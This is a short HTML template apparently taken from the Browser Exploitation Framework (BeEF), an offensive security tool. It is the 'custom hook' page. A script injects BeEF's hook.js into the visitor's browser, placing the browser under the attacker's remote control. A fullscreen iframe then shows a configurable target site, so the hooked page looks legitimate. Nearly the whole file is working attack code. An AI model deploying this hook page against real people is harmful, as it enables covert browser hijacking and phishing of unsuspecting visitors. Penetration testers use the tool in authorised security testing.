24 lines
728 B
HTML
24 lines
728 B
HTML
<!--
|
|
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
|
|
Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
See the file 'doc/COPYING' for copying permission
|
|
-->
|
|
<html>
|
|
<head>
|
|
<title><%= @customhook_title %></title>
|
|
<script>
|
|
var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
|
|
document.write(commandModuleStr);
|
|
</script>
|
|
</head>
|
|
|
|
<body>
|
|
<script>
|
|
setTimeout("beef.dom.createIframe('fullscreen','get',{'src':'<%= @customhook_target %>'},{},null)",2000);
|
|
document.body.scroll = "no";
|
|
document.documentElement.style.overflow = 'hidden';
|
|
//Porco dio - and away we go!
|
|
</script>
|
|
</body>
|
|
</html>
|